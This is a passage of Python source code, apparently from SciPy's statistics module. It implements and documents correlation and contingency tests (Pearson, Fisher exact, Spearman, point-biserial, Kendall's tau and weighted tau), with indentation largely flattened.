ssbn += _square_of_sums(a - offset) / len(a)
# Naming: variables ending in bn/b are for "between treatments", wn/w are
# for "within treatments"
ssbn -= _square_of_sums(alldata) / bign
sswn = sstot - ssbn
dfbn = num_groups - 1
dfwn = bign - num_groups
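    # F is the ratio of the mean square between groups to the mean square
    # within groups; its p-value comes from the F distribution with
    # (dfbn, dfwn) degrees of freedom.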
msb = ssbn / dfbn
msw = sswn / dfwn
f = msb / msw
prob = special.fdtrc(dfbn, dfwn, f) # equivalent to stats.f.sf
return F_onewayResult(f, prob)
class PearsonRConstantInputWarning(RuntimeWarning):
"""Warning generated by `pearsonr` when an input is constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is constant; the correlation coefficent "
"is not defined.")
self.args = (msg,)
class PearsonRNearConstantInputWarning(RuntimeWarning):
"""Warning generated by `pearsonr` when an input is nearly constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is nearly constant; the computed "
"correlation coefficent may be inaccurate.")
self.args = (msg,)
def pearsonr(x, y):
r"""
Pearson correlation coefficient and p-value for testing non-correlation.
The Pearson correlation coefficient [1]_ measures the linear relationship
between two datasets. The calculation of the p-value relies on the
assumption that each dataset is normally distributed. (See Kowalski [3]_
for a discussion of the effects of non-normality of the input on the
distribution of the correlation coefficient.) Like other correlation
coefficients, this one varies between -1 and +1 with 0 implying no
correlation. Correlations of -1 or +1 imply an exact linear relationship.
Positive correlations imply that as x increases, so does y. Negative
correlations imply that as x increases, y decreases.
The p-value roughly indicates the probability of an uncorrelated system
producing datasets that have a Pearson correlation at least as extreme
as the one computed from these datasets.
Parameters
----------
x : (N,) array_like
Input array.
y : (N,) array_like
Input array.
Returns
-------
r : float
Pearson's correlation coefficient.
p-value : float
Two-tailed p-value.
Warns
-----
PearsonRConstantInputWarning
Raised if an input is a constant array. The correlation coefficient
is not defined in this case, so ``np.nan`` is returned.
PearsonRNearConstantInputWarning
Raised if an input is "nearly" constant. The array ``x`` is considered
nearly constant if ``norm(x - mean(x)) < 1e-13 * abs(mean(x))``.
Numerical errors in the calculation ``x - mean(x)`` in this case might
result in an inaccurate calculation of r.
See Also
--------
spearmanr : Spearman rank-order correlation coefficient.
kendalltau : Kendall's tau, a correlation measure for ordinal data.
Notes
-----
The correlation coefficient is calculated as follows:
.. math::
r = \frac{\sum (x - m_x) (y - m_y)}
{\sqrt{\sum (x - m_x)^2 \sum (y - m_y)^2}}
where :math:`m_x` is the mean of the vector :math:`x` and :math:`m_y` is
the mean of the vector :math:`y`.
Under the assumption that x and y are drawn from independent normal
distributions (so the population correlation coefficient is 0), the
probability density function of the sample correlation coefficient r
is ([1]_, [2]_)::
       (1 - r**2)**(n/2 - 2)
f(r) = ---------------------
           B(1/2, n/2 - 1)
where n is the number of samples, and B is the beta function. This
is sometimes referred to as the exact distribution of r. This is
the distribution that is used in `pearsonr` to compute the p-value.
The distribution is a beta distribution on the interval [-1, 1],
with equal shape parameters a = b = n/2 - 1. In terms of SciPy's
implementation of the beta distribution, the distribution of r is::
dist = scipy.stats.beta(n/2 - 1, n/2 - 1, loc=-1, scale=2)
The p-value returned by `pearsonr` is a two-sided p-value. For a
given sample with correlation coefficient r, the p-value is
the probability that abs(r') of a random sample x' and y' drawn from
the population with zero correlation would be greater than or equal
to abs(r). In terms of the object ``dist`` shown above, the p-value
for a given r and length n can be computed as::
p = 2*dist.cdf(-abs(r))
When n is 2, the above continuous distribution is not well-defined.
One can interpret the limit of the beta distribution as the shape
parameters a and b approach a = b = 0 as a discrete distribution with
equal probability masses at r = 1 and r = -1. More directly, one
can observe that, given the data x = [x1, x2] and y = [y1, y2], and
assuming x1 != x2 and y1 != y2, the only possible values for r are 1
and -1. Because abs(r') for any sample x' and y' with length 2 will
be 1, the two-sided p-value for a sample of length 2 is always 1.
References
----------
.. [1] "Pearson correlation coefficient", Wikipedia,
https://en.wikipedia.org/wiki/Pearson_correlation_coefficient
.. [2] Student, "Probable error of a correlation coefficient",
Biometrika, Volume 6, Issue 2-3, 1 September 1908, pp. 302-310.
.. [3] C. J. Kowalski, "On the Effects of Non-Normality on the Distribution
of the Sample Product-Moment Correlation Coefficient"
Journal of the Royal Statistical Society. Series C (Applied
Statistics), Vol. 21, No. 1 (1972), pp. 1-12.
Examples
--------
>>> from scipy import stats
>>> a = np.array([0, 0, 0, 1, 1, 1, 1])
>>> b = np.arange(7)
>>> stats.pearsonr(a, b)
(0.8660254037844386, 0.011724811003954649)
>>> stats.pearsonr([1, 2, 3, 4, 5], [10, 9, 2.5, 6, 4])
(-0.7426106572325057, 0.1505558088534455)
"""
n = len(x)
if n != len(y):
raise ValueError('x and y must have the same length.')
if n < 2:
raise ValueError('x and y must have length at least 2.')
x = np.asarray(x)
y = np.asarray(y)
# If an input is constant, the correlation coefficient is not defined.
if (x == x[0]).all() or (y == y[0]).all():
warnings.warn(PearsonRConstantInputWarning())
return np.nan, np.nan
# dtype is the data type for the calculations. This expression ensures
# that the data type is at least 64 bit floating point. It might have
# more precision if the input is, for example, np.longdouble.
dtype = type(1.0 + x[0] + y[0])
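# Special case n == 2: r is +1 or -1 (the sign of the slope) and, as explained
# in the Notes section above, the two-sided p-value is always 1.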
if n == 2:
return dtype(np.sign(x[1] - x[0])*np.sign(y[1] - y[0])), 1.0
xmean = x.mean(dtype=dtype)
ymean = y.mean(dtype=dtype)
# By using `astype(dtype)`, we ensure that the intermediate calculations
# use at least 64 bit floating point.
xm = x.astype(dtype) - xmean
ym = y.astype(dtype) - ymean
# Unlike np.linalg.norm or the expression sqrt((xm*xm).sum()),
# scipy.linalg.norm(xm) does not overflow if xm is, for example,
# [-5e210, 5e210, 3e200, -3e200]
normxm = linalg.norm(xm)
normym = linalg.norm(ym)
threshold = 1e-13
if normxm < threshold*abs(xmean) or normym < threshold*abs(ymean):
# If all the values in x (likewise y) are very close to the mean,
# the loss of precision that occurs in the subtraction xm = x - xmean
# might result in large errors in r.
warnings.warn(PearsonRNearConstantInputWarning())
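# r is the inner product of the two centered, unit-normalized vectors,
# i.e. the cosine of the angle between xm and ym.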
r = np.dot(xm/normxm, ym/normym)
# Presumably, if abs(r) > 1, then it is only some small artifact of
# floating point arithmetic.
r = max(min(r, 1.0), -1.0)
# As explained in the docstring, the p-value can be computed as
# p = 2*dist.cdf(-abs(r))
# where dist is the beta distribution on [-1, 1] with shape parameters
# a = b = n/2 - 1. `special.btdtr` is the CDF for the beta distribution
# on [0, 1]. To use it, we make the transformation x = (r + 1)/2; the
# shape parameters do not change. Then -abs(r) used in `cdf(-abs(r))`
# becomes x = (-abs(r) + 1)/2 = 0.5*(1 - abs(r)). (r is cast to float64
# to avoid a TypeError raised by btdtr when r is higher precision.)
ab = n/2 - 1
prob = 2*special.btdtr(ab, ab, 0.5*(1 - abs(np.float64(r))))
return r, prob
def fisher_exact(table, alternative='two-sided'):
"""
Perform a Fisher exact test on a 2x2 contingency table.
Parameters
----------
table : array_like of ints
A 2x2 contingency table. Elements should be non-negative integers.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
Returns
-------
oddsratio : float
This is the prior odds ratio, not a posterior estimate.
p_value : float
P-value, the probability of obtaining a distribution at least as
extreme as the one that was actually observed, assuming that the
null hypothesis is true.
See Also
--------
chi2_contingency : Chi-square test of independence of variables in a
contingency table.
Notes
-----
The calculated odds ratio is different from the one R uses. This scipy
implementation returns the (more common) "unconditional Maximum
Likelihood Estimate", while R uses the "conditional Maximum Likelihood
Estimate".
For tables with large numbers, the (inexact) chi-square test implemented
in the function `chi2_contingency` can also be used.
Examples
--------
Say we spend a few days counting whales and sharks in the Atlantic and
Indian oceans. In the Atlantic ocean we find 8 whales and 1 shark, in the
Indian ocean 2 whales and 5 sharks. Then our contingency table is::
           Atlantic  Indian
whales         8        2
sharks         1        5
We use this table to find the p-value:
>>> import scipy.stats as stats
>>> oddsratio, pvalue = stats.fisher_exact([[8, 2], [1, 5]])
>>> pvalue
0.0349...
The probability that we would observe this or an even more imbalanced ratio
by chance is about 3.5%. A commonly used significance level is 5%--if we
adopt that, we can therefore conclude that our observed imbalance is
statistically significant; whales prefer the Atlantic while sharks prefer
the Indian ocean.
"""
hypergeom = distributions.hypergeom
c = np.asarray(table, dtype=np.int64) # int32 is not enough for the algorithm
if not c.shape == (2, 2):
raise ValueError("The input `table` must be of shape (2, 2).")
if np.any(c < 0):
raise ValueError("All values in `table` must be nonnegative.")
if 0 in c.sum(axis=0) or 0 in c.sum(axis=1):
# If both values in a row or column are zero, the p-value is 1 and
# the odds ratio is NaN.
return np.nan, 1.0
if c[1, 0] > 0 and c[0, 1] > 0:
oddsratio = c[0, 0] * c[1, 1] / (c[1, 0] * c[0, 1])
else:
oddsratio = np.inf
n1 = c[0, 0] + c[0, 1]
n2 = c[1, 0] + c[1, 1]
n = c[0, 0] + c[1, 0]
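# Under the null hypothesis of independence, c[0, 0] follows a hypergeometric
# distribution: n draws (the first column total) from a population of
# n1 + n2 items of which n1 lie in the first row.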
def binary_search(n, n1, n2, side):
"""Binary search for where to begin halves in two-sided test."""
if side == "upper":
minval = mode
maxval = n
else:
minval = 0
maxval = mode
guess = -1
while maxval - minval > 1:
if maxval == minval + 1 and guess == minval:
guess = maxval
else:
guess = (maxval + minval) // 2
pguess = hypergeom.pmf(guess, n1 + n2, n1, n)
if side == "upper":
ng = guess - 1
else:
ng = guess + 1
if pguess <= pexact < hypergeom.pmf(ng, n1 + n2, n1, n):
break
elif pguess < pexact:
maxval = guess
else:
minval = guess
if guess == -1:
guess = minval
if side == "upper":
while guess > 0 and hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
guess -= 1
while hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
guess += 1
else:
while hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
guess += 1
while guess > 0 and hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
guess -= 1
return guess
if alternative == 'less':
pvalue = hypergeom.cdf(c[0, 0], n1 + n2, n1, n)
elif alternative == 'greater':
# Same formula as the 'less' case, but with the second column.
pvalue = hypergeom.cdf(c[0, 1], n1 + n2, n1, c[0, 1] + c[1, 1])
elif alternative == 'two-sided':
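# mode of the hypergeometric distribution of c[0, 0] under the null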
mode = int((n + 1) * (n1 + 1) / (n1 + n2 + 2))
pexact = hypergeom.pmf(c[0, 0], n1 + n2, n1, n)
pmode = hypergeom.pmf(mode, n1 + n2, n1, n)
epsilon = 1 - 1e-4
if np.abs(pexact - pmode) / np.maximum(pexact, pmode) <= 1 - epsilon:
return oddsratio, 1.
elif c[0, 0] < mode:
plower = hypergeom.cdf(c[0, 0], n1 + n2, n1, n)
if hypergeom.pmf(n, n1 + n2, n1, n) > pexact / epsilon:
return oddsratio, plower
guess = binary_search(n, n1, n2, "upper")
pvalue = plower + hypergeom.sf(guess - 1, n1 + n2, n1, n)
else:
pupper = hypergeom.sf(c[0, 0] - 1, n1 + n2, n1, n)
if hypergeom.pmf(0, n1 + n2, n1, n) > pexact / epsilon:
return oddsratio, pupper
guess = binary_search(n, n1, n2, "lower")
pvalue = pupper + hypergeom.cdf(guess, n1 + n2, n1, n)
else:
msg = "`alternative` should be one of {'two-sided', 'less', 'greater'}"
raise ValueError(msg)
pvalue = min(pvalue, 1.0)
return oddsratio, pvalue
SpearmanrResult = namedtuple('SpearmanrResult', ('correlation', 'pvalue'))
def spearmanr(a, b=None, axis=0, nan_policy='propagate'):
"""
Calculate a Spearman correlation coefficient with associated p-value.
The Spearman rank-order correlation coefficient is a nonparametric measure
of the monotonicity of the relationship between two datasets. Unlike the
Pearson correlation, the Spearman correlation does not assume that both
datasets are normally distributed. Like other correlation coefficients,
this one varies between -1 and +1 with 0 implying no correlation.
Correlations of -1 or +1 imply an exact monotonic relationship. Positive
correlations imply that as x increases, so does y. Negative correlations
imply that as x increases, y decreases.
The p-value roughly indicates the probability of an uncorrelated system
producing datasets that have a Spearman correlation at least as extreme
as the one computed from these datasets. The p-values are not entirely
reliable but are probably reasonable for datasets larger than 500 or so.
Parameters
----------
a, b : 1D or 2D array_like, b is optional
One or two 1-D or 2-D arrays containing multiple variables and
observations. When these are 1-D, each represents a vector of
observations of a single variable. For the behavior in the 2-D case,
see under ``axis``, below.
Both arrays need to have the same length in the ``axis`` dimension.
axis : int or None, optional
If axis=0 (default), then each column represents a variable, with
observations in the rows. If axis=1, the relationship is transposed:
each row represents a variable, while the columns contain observations.
If axis=None, then both arrays will be raveled.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
correlation : float or ndarray (2-D square)
Spearman correlation matrix or correlation coefficient (if only 2
variables are given as parameters). Correlation matrix is square with
length equal to total number of variables (columns or rows) in ``a``
and ``b`` combined.
pvalue : float
The two-sided p-value for a hypothesis test whose null hypothesis is
that two sets of data are uncorrelated; it has the same dimensions as rho.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 14.7
Examples
--------
>>> from scipy import stats
>>> stats.spearmanr([1,2,3,4,5], [5,6,7,8,7])
(0.82078268166812329, 0.088587005313543798)
>>> np.random.seed(1234321)
>>> x2n = np.random.randn(100, 2)
>>> y2n = np.random.randn(100, 2)
>>> stats.spearmanr(x2n)
(0.059969996999699973, 0.55338590803773591)
>>> stats.spearmanr(x2n[:,0], x2n[:,1])
(0.059969996999699973, 0.55338590803773591)
>>> rho, pval = stats.spearmanr(x2n, y2n)
>>> rho
array([[ 1. , 0.05997 , 0.18569457, 0.06258626],
[ 0.05997 , 1. , 0.110003 , 0.02534653],
[ 0.18569457, 0.110003 , 1. , 0.03488749],
[ 0.06258626, 0.02534653, 0.03488749, 1. ]])
>>> pval
array([[ 0. , 0.55338591, 0.06435364, 0.53617935],
[ 0.55338591, 0. , 0.27592895, 0.80234077],
[ 0.06435364, 0.27592895, 0. , 0.73039992],
[ 0.53617935, 0.80234077, 0.73039992, 0. ]])
>>> rho, pval = stats.spearmanr(x2n.T, y2n.T, axis=1)
>>> rho
array([[ 1. , 0.05997 , 0.18569457, 0.06258626],
[ 0.05997 , 1. , 0.110003 , 0.02534653],
[ 0.18569457, 0.110003 , 1. , 0.03488749],
[ 0.06258626, 0.02534653, 0.03488749, 1. ]])
>>> stats.spearmanr(x2n, y2n, axis=None)
(0.10816770419260482, 0.1273562188027364)
>>> stats.spearmanr(x2n.ravel(), y2n.ravel())
(0.10816770419260482, 0.1273562188027364)
>>> xint = np.random.randint(10, size=(100, 2))
>>> stats.spearmanr(xint)
(0.052760927029710199, 0.60213045837062351)
"""
a, axisout = _chk_asarray(a, axis)
if a.ndim > 2:
raise ValueError("spearmanr only handles 1-D or 2-D arrays")
if b is None:
if a.ndim < 2:
raise ValueError("`spearmanr` needs at least 2 variables to compare")
else:
# Concatenate a and b, so that we now only have to handle the case
# of a 2-D `a`.
b, _ = _chk_asarray(b, axis)
if axisout == 0:
a = np.column_stack((a, b))
else:
a = np.row_stack((a, b))
n_vars = a.shape[1 - axisout]
n_obs = a.shape[axisout]
if n_obs <= 1:
# Handle empty arrays or single observations.
return SpearmanrResult(np.nan, np.nan)
a_contains_nan, nan_policy = _contains_nan(a, nan_policy)
variable_has_nan = np.zeros(n_vars, dtype=bool)
if a_contains_nan:
if nan_policy == 'omit':
return mstats_basic.spearmanr(a, axis=axis, nan_policy=nan_policy)
elif nan_policy == 'propagate':
if a.ndim == 1 or n_vars <= 2:
return SpearmanrResult(np.nan, np.nan)
else:
# Keep track of variables with NaNs, set the outputs to NaN
# only for those variables
variable_has_nan = np.isnan(a).sum(axis=axisout)
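# Spearman's rho is the Pearson correlation coefficient computed on the
# ranks of the data.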
a_ranked = np.apply_along_axis(rankdata, axisout, a)
rs = np.corrcoef(a_ranked, rowvar=axisout)
dof = n_obs - 2 # degrees of freedom
# rs can have elements equal to 1, so avoid zero division warnings
olderr = np.seterr(divide='ignore')
try:
# clip the small negative values possibly caused by rounding
# errors before taking the square root
t = rs * np.sqrt((dof/((rs+1.0)*(1.0-rs))).clip(0))
finally:
np.seterr(**olderr)
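# two-sided p-value from Student's t distribution with n_obs - 2 degrees of
# freedom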
prob = 2 * distributions.t.sf(np.abs(t), dof)
# For backwards compatibility, return scalars when comparing 2 columns
if rs.shape == (2, 2):
return SpearmanrResult(rs[1, 0], prob[1, 0])
else:
rs[variable_has_nan, :] = np.nan
rs[:, variable_has_nan] = np.nan
return SpearmanrResult(rs, prob)
PointbiserialrResult = namedtuple('PointbiserialrResult',
('correlation', 'pvalue'))
def pointbiserialr(x, y):
r"""
Calculate a point biserial correlation coefficient and its p-value.
The point biserial correlation is used to measure the relationship
between a binary variable, x, and a continuous variable, y. Like other
correlation coefficients, this one varies between -1 and +1 with 0
implying no correlation. Correlations of -1 or +1 imply a determinative
relationship.
This function uses a shortcut formula but produces the same result as
`pearsonr`.
Parameters
----------
x : array_like of bools
Input array.
y : array_like
Input array.
Returns
-------
correlation : float
R value.
pvalue : float
Two-sided p-value.
Notes
-----
`pointbiserialr` uses a t-test with ``n-2`` degrees of freedom.
It is equivalent to `pearsonr`.
The value of the point-biserial correlation can be calculated from:
.. math::
r_{pb} = \frac{\overline{Y_{1}} - \overline{Y_{0}}}{s_{y}}
\sqrt{\frac{N_{0} N_{1}}{N (N - 1)}}
Where :math:`Y_{0}` and :math:`Y_{1}` are means of the metric
observations coded 0 and 1 respectively; :math:`N_{0}` and :math:`N_{1}`
are number of observations coded 0 and 1 respectively; :math:`N` is the
total number of observations and :math:`s_{y}` is the standard
deviation of all the metric observations.
A value of :math:`r_{pb}` that is significantly different from zero is
completely equivalent to a significant difference in means between the two
groups. Thus, an independent-groups t-test with :math:`N-2` degrees of
freedom may be used to test whether :math:`r_{pb}` is nonzero. The
relation between the t-statistic for comparing two independent groups and
:math:`r_{pb}` is given by:
.. math::
t = \sqrt{N - 2}\frac{r_{pb}}{\sqrt{1 - r^{2}_{pb}}}
References
----------
.. [1] J. Lev, "The Point Biserial Coefficient of Correlation", Ann. Math.
Statist., Vol. 20, no.1, pp. 125-126, 1949.
.. [2] R.F. Tate, "Correlation Between a Discrete and a Continuous
Variable. Point-Biserial Correlation.", Ann. Math. Statist., Vol. 25,
No. 3, pp. 603-607, 1954.
.. [3] D. Kornbrot "Point Biserial Correlation", In Wiley StatsRef:
Statistics Reference Online (eds N. Balakrishnan, et al.), 2014.
https://doi.org/10.1002/9781118445112.stat06227
Examples
--------
>>> from scipy import stats
>>> a = np.array([0, 0, 0, 1, 1, 1, 1])
>>> b = np.arange(7)
>>> stats.pointbiserialr(a, b)
(0.8660254037844386, 0.011724811003954652)
>>> stats.pearsonr(a, b)
(0.86602540378443871, 0.011724811003954626)
>>> np.corrcoef(a, b)
array([[ 1. , 0.8660254],
[ 0.8660254, 1. ]])
"""
rpb, prob = pearsonr(x, y)
return PointbiserialrResult(rpb, prob)
KendalltauResult = namedtuple('KendalltauResult', ('correlation', 'pvalue'))
def kendalltau(x, y, initial_lexsort=None, nan_policy='propagate', method='auto'):
"""
Calculate Kendall's tau, a correlation measure for ordinal data.
Kendall's tau is a measure of the correspondence between two rankings.
Values close to 1 indicate strong agreement, values close to -1 indicate
strong disagreement. This is the 1945 "tau-b" version of Kendall's
tau [2]_, which can account for ties and which reduces to the 1938 "tau-a"
version [1]_ in absence of ties.
Parameters
----------
x, y : array_like
Arrays of rankings, of the same shape. If arrays are not 1-D, they will
be flattened to 1-D.
initial_lexsort : bool, optional
Unused (deprecated).
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
method : {'auto', 'asymptotic', 'exact'}, optional
Defines which method is used to calculate the p-value [5]_.
The following options are available (default is 'auto'):
* 'auto': selects the appropriate method based on a trade-off between
speed and accuracy
* 'asymptotic': uses a normal approximation valid for large samples
* 'exact': computes the exact p-value, but can only be used if no ties
are present
Returns
-------
correlation : float
The tau statistic.
pvalue : float
The two-sided p-value for a hypothesis test whose null hypothesis is
an absence of association, tau = 0.
See Also
--------
spearmanr : Calculates a Spearman rank-order correlation coefficient.
theilslopes : Computes the Theil-Sen estimator for a set of points (x, y).
weightedtau : Computes a weighted version of Kendall's tau.
Notes
-----
The definition of Kendall's tau that is used is [2]_::
tau = (P - Q) / sqrt((P + Q + T) * (P + Q + U))
where P is the number of concordant pairs, Q the number of discordant
pairs, T the number of ties only in `x`, and U the number of ties only in
`y`. If a tie occurs for the same pair in both `x` and `y`, it is not
added to either T or U.
References
----------
.. [1] Maurice G. Kendall, "A New Measure of Rank Correlation", Biometrika
Vol. 30, No. 1/2, pp. 81-93, 1938.
.. [2] Maurice G. Kendall, "The treatment of ties in ranking problems",
Biometrika Vol. 33, No. 3, pp. 239-251. 1945.
.. [3] Gottfried E. Noether, "Elements of Nonparametric Statistics", John
Wiley & Sons, 1967.
.. [4] Peter M. Fenwick, "A new data structure for cumulative frequency
tables", Software: Practice and Experience, Vol. 24, No. 3,
pp. 327-336, 1994.
.. [5] Maurice G. Kendall, "Rank Correlation Methods" (4th Edition),
Charles Griffin & Co., 1970.
Examples
--------
>>> from scipy import stats
>>> x1 = [12, 2, 1, 12, 2]
>>> x2 = [1, 4, 7, 1, 0]
>>> tau, p_value = stats.kendalltau(x1, x2)
>>> tau
-0.47140452079103173
>>> p_value
0.2827454599327748
"""
x = np.asarray(x).ravel()
y = np.asarray(y).ravel()
if x.size != y.size:
raise ValueError("All inputs to `kendalltau` must be of the same size, "
"found x-size %s and y-size %s" % (x.size, y.size))
elif not x.size or not y.size:
return KendalltauResult(np.nan, np.nan) # Return NaN if arrays are empty
# check both x and y
cnx, npx = _contains_nan(x, nan_policy)
cny, npy = _contains_nan(y, nan_policy)
contains_nan = cnx or cny
if npx == 'omit' or npy == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'propagate':
return KendalltauResult(np.nan, np.nan)
elif contains_nan and nan_policy == 'omit':
x = ma.masked_invalid(x)
y = ma.masked_invalid(y)
return mstats_basic.kendalltau(x, y, method=method)
if initial_lexsort is not None: # deprecate to drop!
warnings.warn('"initial_lexsort" is gone!')
def count_rank_tie(ranks):
cnt = np.bincount(ranks).astype('int64', copy=False)
cnt = cnt[cnt > 1]
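# For each group of t tied values accumulate t*(t-1)/2 (the number of tied
# pairs), t*(t-1)*(t-2) and t*(t-1)*(2*t+5); the last two quantities enter
# the variance of the asymptotic statistic below.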
return ((cnt * (cnt - 1) // 2).sum(),
(cnt * (cnt - 1.) * (cnt - 2)).sum(),
(cnt * (cnt - 1.) * (2*cnt + 5)).sum())
size = x.size
perm = np.argsort(y) # sort on y and convert y to dense ranks
x, y = x[perm], y[perm]
y = np.r_[True, y[1:] != y[:-1]].cumsum(dtype=np.intp)
# stable sort on x and convert x to dense ranks
perm = np.argsort(x, kind='mergesort')
x, y = x[perm], y[perm]
x = np.r_[True, x[1:] != x[:-1]].cumsum(dtype=np.intp)
dis = _kendall_dis(x, y) # discordant pairs
obs = np.r_[True, (x[1:] != x[:-1]) | (y[1:] != y[:-1]), True]
cnt = np.diff(np.nonzero(obs)[0]).astype('int64', copy=False)
ntie = (cnt * (cnt - 1) // 2).sum() # joint ties
xtie, x0, x1 = count_rank_tie(x) # ties in x, stats
ytie, y0, y1 = count_rank_tie(y) # ties in y, stats
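# total number of pairs of observations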
tot = (size * (size - 1)) // 2
if xtie == tot or ytie == tot:
return KendalltauResult(np.nan, np.nan)
# Note that tot = con + dis + (xtie - ntie) + (ytie - ntie) + ntie
# = con + dis + xtie + ytie - ntie
con_minus_dis = tot - xtie - ytie + ntie - 2 * dis
tau = con_minus_dis / np.sqrt(tot - xtie) / np.sqrt(tot - ytie)
# Limit range to fix computational errors
tau = min(1., max(-1., tau))
if method == 'exact' and (xtie != 0 or ytie != 0):
raise ValueError("Ties found, exact method cannot be used.")
if method == 'auto':
if (xtie == 0 and ytie == 0) and (size <= 33 or min(dis, tot-dis) <= 1):
method = 'exact'
else:
method = 'asymptotic'
if xtie == 0 and ytie == 0 and method == 'exact':
# Exact p-value, see Maurice G. Kendall, "Rank Correlation Methods" (4th Edition), Charles Griffin & Co., 1970.
c = min(dis, tot-dis)
if size <= 0:
raise ValueError
elif c < 0 or 2*c > size*(size-1):
raise ValueError
elif size == 1:
pvalue = 1.0
elif size == 2:
pvalue = 1.0
elif c == 0:
pvalue = 2.0/math.factorial(size) if size < 171 else 0.0
elif c == 1:
pvalue = 2.0/math.factorial(size-1) if (size-1) < 171 else 0.0
else:
new = [0.0]*(c+1)
new[0] = 1.0
new[1] = 1.0
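# new[k] counts permutations of the first j elements with exactly k
# discordant pairs (inversions); summing over k <= c and doubling gives the
# two-sided p-value.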
for j in range(3,size+1):
old = new[:]
for k in range(1,min(j,c+1)):
new[k] += new[k-1]
for k in range(j,c+1):
new[k] += new[k-1] - old[k-j]
pvalue = 2.0*sum(new)/math.factorial(size) if size < 171 else 0.0
elif method == 'asymptotic':
# con_minus_dis is approx normally distributed with this variance [3]_
var = (size * (size - 1) * (2.*size + 5) - x1 - y1) / 18. + (
2. * xtie * ytie) / (size * (size - 1)) + x0 * y0 / (9. *
size * (size - 1) * (size - 2))
pvalue = special.erfc(np.abs(con_minus_dis) / np.sqrt(var) / np.sqrt(2))
else:
raise ValueError("Unknown method "+str(method)+" specified, please use auto, exact or asymptotic.")
return KendalltauResult(tau, pvalue)
WeightedTauResult = namedtuple('WeightedTauResult', ('correlation', 'pvalue'))
def weightedtau(x, y, rank=True, weigher=None, additive=True):
r"""
Compute a weighted version of Kendall's :math:`\tau`.
The weighted :math:`\tau` is a weighted version of Kendall's
:math:`\tau` in which exchanges of high weight are more influential than
exchanges of low weight. The default parameters compute the additive
hyperbolic version of the index, :math:`\tau_\mathrm h`, which has
been shown to provide the best balance between important and
unimportant elements [1]_.
The weighting is defined by means of a rank array, which assigns a
nonnegative rank to each element, and a weigher function, which
assigns a weight to each element based on its rank. The weight of an
exchange is then the sum or the product of the weights of the ranks of
the exchanged elements. The default parameters compute
:math:`\tau_\mathrm h`: an exchange between elements with rank
:math:`r` and :math:`s` (starting from zero) has weight
:math:`1/(r+1) + 1/(s+1)`.
Specifying a rank array is meaningful only if you have in mind an
external criterion of importance. If, as usually happens, you do
not have in mind a specific rank, the weighted :math:`\tau` is
defined by averaging the values obtained using the decreasing
lexicographical rank by (`x`, `y`) and by (`y`, `x`). This is the
behavior with default parameters.
Note that if you are computing the weighted :math:`\tau` on arrays of
ranks, rather than of scores (i.e., a larger value implies a lower
rank) you must negate the ranks, so that elements of higher rank are
associated with a larger value.
Parameters
----------
x, y : array_like
Arrays of scores, of the same shape. If arrays are not 1-D, they will
be flattened to 1-D.
rank : array_like of ints or bool, optional
A nonnegative rank assigned to each element. If it is None, the
decreasing lexicographical rank by (`x`, `y`) will be used: elements of
higher rank will be those with larger `x`-values, using `y`-values to
break ties (in particular, swapping `x` and `y` will give a different
result). If it is False, the element indices will be used
directly as ranks. The default is True, in which case this
function returns the average of the values obtained using the
decreasing lexicographical rank by (`x`, `y`) and by (`y`, `x`).
weigher : callable, optional
The weigher function. Must map nonnegative integers (zero
representing the most important element) to a nonnegative weight.
The default, None, provides hyperbolic weighting, that is,
rank :math:`r` is mapped to weight :math:`1/(r+1)`.
additive : bool, optional
If True, the weight of an exchange is computed by adding the
weights of the ranks of the exchanged elements; otherwise, the weights
are multiplied. The default is True.
Returns
-------
correlation : float
The weighted :math:`\tau` correlation index.
pvalue : float
Presently ``np.nan``, as the null distribution of the statistic is unknown
(even in the additive hyperbolic case).
See Also
--------
kendalltau : Calculates Kendall's tau.
spearmanr : Calculates a Spearman rank-order correlation coefficient.
theilslopes : Computes the Theil-Sen estimator for a set of points (x, y).
Notes
-----
This function uses an :math:`O(n \log n)`, mergesort-based algorithm
[1]_ that is a weighted extension of Knight's algorithm for Kendall's
:math:`\tau` [2]_. It can compute Shieh's weighted :math:`\tau` [3]_
between rankings without ties (i.e., permutations) by setting
`additive` and `rank` to False, as the definition given in [1]_ is a
generalization of Shieh's.
NaNs are considered the smallest possible score.
.. versionadded:: 0.19.0
References
----------
.. [1] Sebastiano Vigna, "A weighted correlation index for rankings with
ties", Proceedings of the 24th international conference on World
Wide Web, pp. 1166-1176, ACM, 2015.
.. [2] W.R. Knight, "A Computer Method for Calculating Kendall's Tau with
Ungrouped Data", Journal of the American Statistical Association,
Vol. 61, No. 314, Part 1, pp. 436-439, 1966.
.. [3] Grace S. Shieh. "A weighted Kendall's tau statistic", Statistics &
Probability Letters, Vol. 39, No. 1, pp. 17-24, 1998.
Examples
--------
>>> from scipy import stats
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> tau, p_value = stats.weightedtau(x, y)
>>> tau
-0.56694968153682723
>>> p_value
nan
>>> tau, p_value = stats.weightedtau(x, y, additive=False)
>>> tau
-0.62205716951801038
NaNs are considered the smallest possible score:
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, np.nan]
>>> tau, _ = stats.weightedtau(x, y)
>>> tau
-0.56694968153682723
This is exactly Kendall's tau:
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> tau, _ = stats.weightedtau(x, y, weigher=lambda x: 1)
>>> tau
-0.47140452079103173
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> stats.weightedtau(x, y, rank=None)
